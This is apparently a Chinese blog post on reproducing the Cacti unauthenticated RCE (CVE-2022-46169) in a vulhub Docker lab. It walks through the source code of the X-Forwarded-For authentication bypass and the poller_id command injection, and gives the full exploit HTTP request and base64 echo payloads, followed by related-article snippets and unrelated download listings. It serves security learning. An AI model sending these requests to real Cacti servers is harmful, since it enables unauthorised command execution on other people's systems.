复现cacti的RCE

最新推荐文章于 2025-08-07 16:44:20 发布
原创 最新推荐文章于 2025-08-07 16:44:20 发布 · 449 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

1.环境搭建

环境搭建

在 GitHub 上复制链接地址 vulhub

 git clone https://github.com/vulhub/vulhub

拉取完成之后,可以在/vulhub/cacti目录下查看

启动容器

在/vulhub/cacti文件夹内 CVE-2022-46169,输入命令:

 docker-compose up -d

环境启动后,访问http://your-ip:8080会跳转到登录页面。使用admin/admin作为账号密码登录,并根据页面中的提示进行初始化。

创建一个新图形,选device-uptime然后创建就行了,创建完之后就可以退出了

2.代码审计

完成上述初始化后,我们切换到攻击者的角色。作为攻击者,发送如下数据包:

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

开始分析

在remote_agent.php中加载相关文件:

指令进入代码之后首先回进入下面这个if函数中

        当远程客户端未授权时将会显示“您无权使用此服务”并退出程序,绕过此if鉴权函数时将会进行get传参请求,由于get传递的参数用户可控,我们的命令需要在switch函数下poldatapoll_for_data();执行

        在poll_for_data();该函数中,同步执行三个有一定过滤的请求,因此get传参action三个参数

拿到payload

我们对其进行抓包,在浏览器地址栏输入/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=touch+/tmp/success

我们需要添加X-Forwarded-For: 127.0.0.1获取get_client_addr();客户端

X-Forwarded-For:127.0.0.1

        在remote_agent.php文件中的 $client_addr = get_client_addr();下插入print_r($client_addr);获取客户端的值是否为127.0.0.1

        在$client_name = gethostbyaddr($client_addr);下插入print_r($client_name);打印出是否为hostname值并exit中断程序

        在functions.php文件中有关于 get_client_addr函数

function get_client_addr($client_addr = false) {
	$http_addr_headers = array(
		'X-Forwarded-For',
		'X-Client-IP',
		'X-Real-IP',
		'X-ProxyUser-Ip',
		'CF-Connecting-IP',
		'True-Client-IP',
		'HTTP_X_FORWARDED',
		'HTTP_X_FORWARDED_FOR',
		'HTTP_X_CLUSTER_CLIENT_IP',
		'HTTP_FORWARDED_FOR',
		'HTTP_FORWARDED',
		'HTTP_CLIENT_IP',
		'REMOTE_ADDR',
	);

	$client_addr = false;
	foreach ($http_addr_headers as $header) {
		if (!empty($_SERVER[$header])) {
			$header_ips = explode(',', $_SERVER[$header]);
			foreach ($header_ips as $header_ip) {
				if (!empty($header_ip)) {
					if (!filter_var($header_ip, FILTER_VALIDATE_IP)) {
						cacti_log('ERROR: Invalid remote client IP Address found in header (' . $header . ').', false, 'AUTH', POLLER_VERBOSITY_DEBUG);
					} else {
						$client_addr = $header_ip;
						cacti_log('DEBUG: Using remote client IP Address found in header (' . $header . '): ' . $client_addr . ' (' . $_SERVER[$header] . ')', false, 'AUTH', POLLER_VERBOSITY_DEBUG);
						break 2;
					}
				}
			}
		}
	}

	return $client_addr;
}

        目前该函数中,client_addr为X-Forwarded-For走到foreach函数中进行循环,header即为X-Forwarded-For所以不为空跳到下一层循环,由于127.0.0.1为合法ip所以跳入else,将其赋值给$client_addr我们可以将其打印出来,这样更清晰的显示出来

        在burpsuite发送,可知hostname就是localhost。

$pollers里的hostname在数据库表中为localhost$client_name的值localhost相等因此会返回true,至此if鉴权函数已经绕过
只要有success,代码即执行成功

get传参

传递了三个参数:

	$local_data_ids = get_nfilter_request_var('local_data_ids');
	$host_id        = get_filter_request_var('host_id');
	$poller_id      = get_nfilter_request_var('poller_id');
	$return         = array();

第一行代码传数组[0]=6数组只有一个元素6
第二行代码传参1
第三行代码传命令执行如touch

打印查看返回值

Array
(
[0] => 6
)
1 touch /tmp/success

开始遍历

$items = db_fetch_assoc_prepared('SELECT *
	FROM poller_item
	WHERE host_id = ?
	AND local_data_id = ?',
	array($host_id, $local_data_id));

通过第一个if查询到数组为

       local_data_id: 6
           poller_id: 1
             host_id: 1
              action: 2
             present: 1
        last_updated: 2025-07-25 06:10:01
            hostname: localhost
      snmp_community: public
        snmp_version: 0
       snmp_username:
       snmp_password:
  snmp_auth_protocol:
snmp_priv_passphrase:
  snmp_priv_protocol:
        snmp_context:
      snmp_engine_id:
           snmp_port: 161
        snmp_timeout: 500
            rrd_name: uptime
            rrd_path: /var/www/html/rra/local_linux_machine_uptime_6.rrd
             rrd_num: 1
            rrd_step: 300
       rrd_next_step: 0
                arg1: /var/www/html/scripts/ss_hstats.php ss_hstats '1' uptime
                arg2:
                arg3:

第二个遍历

$script_server_calls = db_fetch_cell_prepared('SELECT COUNT(*)
	FROM poller_item
	WHERE host_id = ?
	AND local_data_id = ?
	AND action = 2',
	array($host_id, $local_data_id));

将数组里的action取出,值为2
由于POLLER_ACTION_SCRIPT_PHP值为2,因此将会匹配到case POLLER_ACTION_SCRIPT_PHP
进入到该case中进行第一个if函数

if (function_exists('proc_open')) {
							$cactiphp = proc_open(read_config_option('path_php_binary') . ' -q ' . $config['base_path'] . '/script_server.php realtime ' . $poller_id, $cactides, $pipes);
							$output = fgets($pipes[1], 1024);
							$using_proc_function = true;
						} else {
							$using_proc_function = false;
						}

通过该代码的read_config_option('path_php_binary')取出php路径执行 /usr/local/bin/php -q script_server.php realtime touch /tmp/success

回显

对以下三个命令进行urlencode编码

echo "test\r\n`id" | xxd -p -c 1|awk '{printf \"%s \", $0}'`"; 
echo "test\r\n :`id | base64 -w0`"; 
echo "test\r\n`id |base64 -w0|awk -v ORS=':' '{print $0}'`";

输入到burpsuite中,获得回显

dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkK

再进行base64解码

uid=33(www-data) gid=33(www-data) groups=33(www-data)

复现cactiRCE(CVE-2022-46169)
LOXOI的博客
07-29 430
Linux验证安装。
cactiRCE
fatsheep8_5的博客
07-28 1060
1,先判断鉴权的问题,就走到了remote_client_authorized()这个函数,2,然后这个函数会走到get_client_addr()这个函数里面---》break 2---漏洞起始点--》X-Forwarded-For----》为127.0.0.1----》通过这个函数转换成localhost3,数据库查询的poller的ids=6以及action为2的hostname值也为localhost4,这两个相等,所以就return true。
cacti 错误 ERROR: SQL Assoc Failed!, Error:'145'
weixin_33918357的博客
05-16 276
一次意外断掉后,cacit监控无数据了,查看日志:2013年05月16日 10:54:41 AM - CMDPHP: Poller[0] ERROR: SQL Assoc Failed!, Error:'145', SQL:"select poller_output.output, poller_output.time, poller_output.local_data...
CACTI 不画图 ,报错 Poller[0] ERROR: SQL Assoc Failed,解决办法!
热门推荐
wangxiaofei2006的专栏
01-02 1万+
1、CACTI 不画图 类似报错 Poller[0] ERROR: SQL Assoc Failed!, Error:'1017' 2013年10月09日 14:30:06 PM - CMDPHP: Poller[0] ERROR: SQL Assoc Failed!, Error:'145', SQL:"select poller_output.output, poll
Cacti RCE漏洞复现
A4111014430的博客
07-28 333
Cacti 1.2.22及之前版本存在一个远程代码执行漏洞(CVE-2022-46169),攻击者可以通过精心构造的HTTP请求在服务器上执行任意命令。在VSCode中安装PHP Debug扩展。在remote_agent.php中设置断点。1、访问Cacti安装页面完成安装。1. 安装PHP Debug扩展。2. 配置launch.json。1. 创建Docker容器。三、VSCode调试配置。2. 安装Xdebug。3. 配置Xdebug。4. 安装Cacti
完整复现cactiRCE
quencep的博客
08-05 1015
这里的$client_name代表的就是localhost,和$poller里面的hostname是相同的所以直接返回true,这里能返回ture,证明鉴权就绕过了。这段代码的核心逻辑是权限校验,具体解析如下: - remote_client_authorized() 是一个函数,推。以上的action的值都是1,但是我们根据上面的poll_for_data(),得出我们需要的action是2。把每一条数据都拿出来,就是上面的那个1 ,2,3那个数据,把里面的action取出来,里面只有6是2其他。
cactiRCE复现
2201_75933505的博客
08-02 934
摘要:Cacti 1.2.17-1.2.22版本存在RCE漏洞(CVE-2022-46169),问题源于remote_agent.php文件存在验证缺陷。可通过伪造HTTP头绕过身份验证,控制poller_id参数触发proc_open函数执行任意命令。复现过程包括:下载漏洞版本、部署Docker环境、修改数据库配置、绕过鉴权函数分析,最终通过构造特定payload实现命令执行。该漏洞影响范围广,需及时升级防护。
cactirce的完整复现过程
m0_75188989的博客
08-02 344
6.这个漏洞的利用需要Cacti应用中至少存在一个类似是POLLER_ACTION_SCRIPT_PHP的采集器。5.回显两个 done 就表示启动成功了,然后浏览器访问,按照引导进行安装。1. 创建Docker容器,首先,我们需要一个包含PHP 7.4和。2.在 GitHub 上复制链接地址 vulhub。8.使用 VScode 连接容器。
cact的RCE漏洞复现
2301_81140745的博客
08-07 745
并且因为action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success`所有我们的攻击点为传action参数的地方。&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success`传参中强制选择的polldata情况。发现了只有第6个库的action才是2 所以我们需要查询的是第6给库 才传递了参数。所有的一切都是围绕着让我们传入的参数绕过他的防御代码为目的。
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
Cacti 未经身份验证的命令注入 CVE-2022-46169复现
aihua002的博客
12-12 525
再利用此漏洞之前,添加新的“graphs”,因为此漏洞需要POLLER_ACTION_SCRIPT_PHP的采集器。选择的Graph Type是“Device - Uptime”,点击创建。默认账户密码admin/admin。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8860
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
autobuild:基础构建系统,用于导入和构建软件包,基于Rock(机器人构建套件)的autoproj
01-04
先展示下效果 https://pan.quark.cn/s/e612e515c6cb 自动构建的定义是什么? Autobuild是由与构建系统(例如,autotools,CMake)和导入机制(git,svn,...)相连接的类群组构成。 它被应用于开发更高级别的工具,这些工具提供了对整个工作区进行管理的功能。 为了安装此程序,需将这行代码加入到您的应用程序的Gemfile文件中:gem autobuild 随后执行:$ bundle或者将其自行安装为:$ gem install autobuild在签出存储库之后,执行bundle install来安装所依赖的组件。 接着,执行bundle exec rake test来执行测试操作。 若需将这个gem安装到本地设备上,请运行bundle exec rake install 。 当准备发布新版本时,应更新version.rb文件中的版本标识,然后运行bundle exec rake release ,该命令将为这一版本生成git标签,推送git的提交记录和标签。
PasswordGenerator: HTML/CSS/JavaScript制作的密码生成器
最新发布
01-04
下载前必看:https://pan.quark.cn/s/a4b39357ea24 ram-password 随机密码生成器
【无人机协同】动态环境下多无人机系统的协同路径规划与防撞研究(Matlab代码实现)​
01-04
【无人机协同】动态环境下多无人机系统的协同路径规划与防撞研究(Matlab代码实现)​ 内容概要:本文围绕动态环境下多无人机系统的协同路径规划与防撞问题展开研究,提出基于Matlab代码实现的解决方案。研究重点在于设计适用于动态环境的路径规划算法,确保多无人机在复杂任务场景下能够高效协同飞行并有效避免碰撞。文中结合智能优化算法与路径规划技术,探讨了无人机编队、任务分配及实时避障策略,通过Matlab仿真验证所提方法的有效性与鲁棒性,为多无人机系统在实际应用场景中的部署提供了技术支持和理论依据。; 适合人群:具备一定Matlab编程基础,从事无人机控制、路径规划或智能优化算法研究的科研人员及研究生。; 使用场景及目标:①应用于灾害救援、环境监测、物流配送等多无人机协同作业场景;②实现动态环境中无人机间的高效协同与安全避障,提升任务执行效率与系统安全性; 阅读建议:建议结合文中提供的Matlab代码进行仿真实践,深入理解算法实现细节,并可根据具体应用场景调整参数或扩展功能以满足实际需求。
Bottle Fin实例分割数据集-20251117-165640.zip
01-04
一、基础信息 数据集名称:Bottle Fin实例分割数据集 图片数量: 训练集:4418张图片 验证集:1104张图片 总计:5522张图片 分类类别: - 类别0: 数字0 - 类别1: 数字1 - 类别2: 数字2 - 类别3: 数字3 - 类别4: 数字4 - 类别5: 数字5 - 类别6: Bottle Fin 标注格式:YOLO格式,包含多边形坐标,适用于实例分割任务。 数据格式:图片格式常见如JPEG或PNG,具体未指定。 二、适用场景 实例分割AI模型开发:数据集支持实例分割任务,帮助构建能够精确识别和分割图像中多个对象的AI模型,适用于对象检测和分割应用。 工业自动化与质量控制:可能应用于制造、物流或零售领域,用于自动化检测和分类物体,提升生产效率。 计算机视觉研究:支持实例分割算法的学术研究,促进目标检测和分割技术的创新。 教育与实践培训:可用于高校或培训机构的计算机视觉课程,作为实例分割任务的实践资源,帮助学生理解多类别分割。 三、数据集优势 多类别设计:包含7个不同类别,涵盖数字和Bottle Fin对象,增强模型对多样对象的识别和分割能力。 高质量标注:标注采用YOLO格式的多边形坐标,确保分割边界的精确性,提升模型训练效果。 数据规模适中:拥有超过5500张图片,提供充足的样本用于模型训练和验证,支持稳健的AI开发。 即插即用兼容性:标注格式直接兼容主流深度学习框架(如YOLO),便于快速集成到各种实例分割项目中。
基于Python与Qt的产品管理应用.zip
01-04
基于Python与Qt的产品管理应用
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值